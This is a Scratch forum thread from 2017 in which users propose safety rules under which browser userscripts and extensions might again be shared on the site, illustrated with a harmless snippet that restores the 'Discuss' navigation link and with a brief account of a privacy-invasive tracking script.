Extensions/Userscripts: Is there a fair compromise?

infinitytec

As many of you know, the ST now does not allow sharing and promoting browser extensions and userscripts on the Scratch website. Many are upset about this change, as it is definitely less enjoyable to make additional features to customize the way the site works. However, the Scratch Team has a valid reason for restricting them:

ceebee wrote:
Browser-based extensions and userscripts can be risky because they can get access to everything you do online. This means that they could potentially get information about the websites you visit, collect private information about you, and change what you see in ways you don’t expect. In the past, we have allowed these to be advertised on Scratch because they can also be fun, safe, and helpful tools – and because we’ve seen that Scratchers can learn a lot by making them. But we feel the risks and potential harm outweigh these benefits.

Can we find a middle ground? Some way to ensure extensions and userscripts are safe for everyone to use?

Please discuss. I hope we will be able to find a way around this disagreement.
Scratch team: please join in the conversation. If we are able to make everyone happy with a compromise, we will need your support.

Here are some ideas:

infinitytec wrote:
The Community Guidelines must be followed: if a userscript or extension violates the community guidelines, it cannot bee advertised. Links to it shall be removed.
Userscripts and extensions must be open-source: that way the community and users can examine the code to determine its safety.
No collecting and sharing of user data: extensions and userscripts must not make any data available to anyone.
Local resources only: the userscript or extension must run completely on the user's computer. Servers are not to send or receive data with the userscript or extension. However, a server may be used to distribute the userscript or extension, as long as it is secure. For example: userscripts can be downloaded off of GitHub and extensions can be downloaded via the browser's official extension site.
Transparency: users should know exactly what the userscript or extension does. The extension or userscript should have a forum thread that adequately describes what it does. While the userscript or extension is available, the forum thread must be open so issues can be reported. On closing the thread, all download links will be removed. When advertising the userscript or extension, any links for it must point to that forum thread and not an external website.
Ultimately, the Scratch Team gets the final say. They can handle violations in the way that seems best based on the Community Guidelines and the userscript/extension security and distribution policy.

PullJosh wrote:
Don't share scripts that result in any sharing of user data, even if it's opt-in. Many users – especially younger Scratchers – aren't aware of the full implications of safety decisions that they make, and could end up doing something that they don't mean to.
Always make the source code for anything you share easily available. (This means no scripts that require a server/backend to run!) Everybody who wants the script should have easy access to every line of code involved, and should be encouraged to read it and look out for anything that would be of concern to them. Forum users should also check each other's scripts when possible to spot any security issues (intentional or not).
Always, always, always respect what the ST says. They're doing difficult but important work running this site, and it's our job to make their lives easy.

NitroCipher wrote:
Does not link to dangerous websites
Follows community guidelines
Submission request must include proper grammar and punctuation
Discussion

Note: I have removed some duplicate ideas.

Please note: I am not promoting the use of a userscript or extension. I just want to see if there is a way to make everyone happy.

Last edited by infinitytec (Dec. 22, 2017 00:00:39)

PullJosh

Personally, I've never been a big fan of set-in-stone rules. I don't think that a system of regulations will ever be able to cover every possible situation.

My Reccomendation
Interpret the ST's comments in a way that makes sense, not word-for-word. To be clear, I am NOT recommending that you disregard what the ST says. What I AM reccomending is that Scratchers take serious time to consider whether what they are developing and sharing is useful to other people without posing any potential threat, even to new and uninformed Scratchers. Honestly, as long as you use your noggin and do what's right, I don't think anybody will have an issue.

Some Examples
GOOD (imo)
When the discuss button was removed from the navigation bar, many users wanted it back. I see no harm in sharing a userscript such as this one which restores it:

(function() {
  var nav = document.querySelector("#topnav ul.site-nav, #navigation .inner>ul");
  var discuss = document.createElement("li");
  var discuss_a = discuss.appendChild( document.createElement('a') );
  discuss_a.setAttribute("href", "/discuss/");
  discuss_a.innerText = "Discuss";
  if (nav.className === "site-nav") {
      nav.insertBefore(discuss, nav.children[2]);
  } else {
      discuss.className = "link discuss";
      nav.insertBefore(discuss, nav.querySelector("li.tips"));
  }
})();

BAD (imo)
Back in the day, some users and I created the Mega Scratch Userscript. I would say that this one is a little more dicey. I can personally attest to the safety of the userscript (as I played a role in developing it), but it's a large enough script that a person could hide something dangerous inside if they wanted to. (Obviously don't install MSU unless you're really confident in its safety. Not trying to hurt anybody or intentionally break the ST's mandates.) In all honesty, I would not reccomend sharing a script like MSU again in the future. However, I would see less harm in sharing the same features that MSU included as their own individual userscripts which are simpler to read and easy to check for security and safety concerns.

BAD (in the opinion of the ST and myself)
isOnline was a decent idea, but it ended up with some real security concerns. isOnline, out of necessity, tracked a lot of information about users. The first was the exact times in which a user logged on. Already, this information could be used to determine roughly where a person lives (based on time zones.) Next, isOnline started tracking the relationships between Scratchers: who your friends are, and how often you interact with them. This was absolutely an invasion of the privacy of Scratchers and goes against the safe, open community space that the Scratch Team works hard to create.

Final Words

Don't share scripts that result in any sharing of user data, even if it's opt-in. Many users – especially younger Scratchers – aren't aware of the full implications of safety decisions that they make, and could end up doing something that they don't mean to.
Always make the source code for anything you share easily available. (This means no scripts that require a server/backend to run!) Everybody who wants the script should have easy access to every line of code involved, and should be encouraged to read it and look out for anything that would be of concern to them. Forum users should also check each other's scripts when possible to spot any security issues (intentional or not).
Always, always, always respect what the ST says. They're doing difficult but important work running this site, and it's our job to make their lives easy.

infinitytec

PullJosh wrote:
-snip-

Good thoughts! The no-backbone rule I think would be helpful to apply.

bobbybee

infinitytec wrote:
PullJosh wrote:
-snip-
Good thoughts! The no-backbone rule I think would be helpful to apply.

Now about auditing Scratch's source, hmm….

DeleteThisAcount

hmm I have problem with all of this.

i no trust scratch security SCRATCH TEAM MAKE ACRATCH OPEN SOUCE NOWWWWWWWWWWW or at least the 2.0 site. k the bub bye

PullJosh

DeleteThisAcount wrote:
hmm I have problem with all of this.

i no trust scratch security SCRATCH TEAM MAKE ACRATCH OPEN SOUCE NOWWWWWWWWWWW or at least the 2.0 site. k the bub bye

This doesn't seem like a particularly useful contribution.

As I'm sure you're aware, Scratch 3.0 is fully open source, as well as a decent portion of the website's code.

Anyway, this topic is about extensions and userscripts, so let's focus on that.

infinitytec

I updated the OP to have some ideas that people have had that can be implemented.

So this is what I think:

The Community Guidelines must be followed: if a userscript or extension violates the community guidelines, it cannot bee advertised. Links to it shall be removed.
Userscripts and extensions must be open-source: that way the community and users can examine the code to determine its safety.
No collecting and sharing of user data: extensions and userscripts must not make any data available to anyone.
Local resources only: the userscript or extension must run completely on the user's computer. Servers are not to send or receive data with the userscript or extension. However, a server may be used to distribute the userscript or extension, as long as it is secure. For example: userscripts can be downloaded off of GitHub and extensions can be downloaded via the browser's official extension site.
Transparency: users should know exactly what the userscript or extension does. The extension or userscript should have a forum thread that adequately describes what it does. While the userscript or extension is available, the forum thread must be open so issues can be reported. On closing the thread, all download links will be removed. When advertising the userscript or extension, any links for it must point to that forum thread and not an external website.
Ultimately, the Scratch Team gets the final say. They can handle violations in the way that seems best based on the Community Guidelines and the userscript/extension security and distribution policy.

Last edited by infinitytec (Dec. 21, 2017 04:30:26)

MathWizz

Reminds me of when I found two different bugs back when 2.0 was in alpha… Anyone's project could be overwritten by anyone, and non-sandboxed JavaScript extensions could be loaded into a project on the main Scratch website (not ScratchX.) Apparently the ST did not consider my way of revealing the issue by including a snippet of JavaScript in someone's project “good exploit disclosure practice.”

Last edited by MathWizz (Dec. 21, 2017 05:14:14)

Jonathan50

PullJosh wrote:
As I'm sure you're aware, Scratch 3.0 is fully open source, as well as a decent portion of the website's code.

But not the backend

Last edited by Jonathan50 (Dec. 21, 2017 06:56:03)

PullJosh

infinitytec wrote:
I updated the OP to have some ideas that people have had that can be implemented.

Looks great!

MathWizz wrote:
-snip-

Classy.

Jonathan50

infinitytec wrote:
So this is what I think:
The Community Guidelines must be followed: if a userscript or extension violates the community guidelines, it cannot bee advertised. Links to it shall be removed.
Userscripts and extensions must be open-source: that way the community and users can examine the code to determine its safety.
No collecting and sharing of user data: extensions and userscripts must not make any data available to anyone.
Local resources only: the userscript or extension must run completely on the user's computer. Servers are not to send or receive data with the userscript or extension. However, a server may be used to distribute the userscript or extension, as long as it is secure. For example: userscripts can be downloaded off of GitHub and extensions can be downloaded via the browser's official extension site.
Transparency: users should know exactly what the userscript or extension does. The extension or userscript should have a forum thread that adequately describes what it does. While the userscript or extension is available, the forum thread must be open so issues can be reported. On closing the thread, all download links will be removed. When advertising the userscript or extension, any links for it must point to that forum thread and not an external website.
Ultimately, the Scratch Team gets the final say. They can handle violations in the way that seems best based on the Community Guidelines and the userscript/extension security and distribution policy.

That seems fair, but I think the reason why the Scratch Team said “no advertising userscripts/extensions” is because they don't want to have to either investigate each of the hundreds of userscripts and extensions people share on Scratch or set up an approval thingy like they already have for Scratcher's personal websites.

NitroCipher

please link this to my quote https://scratch.mit.edu/discuss/topic/284391/

Discuss Scratch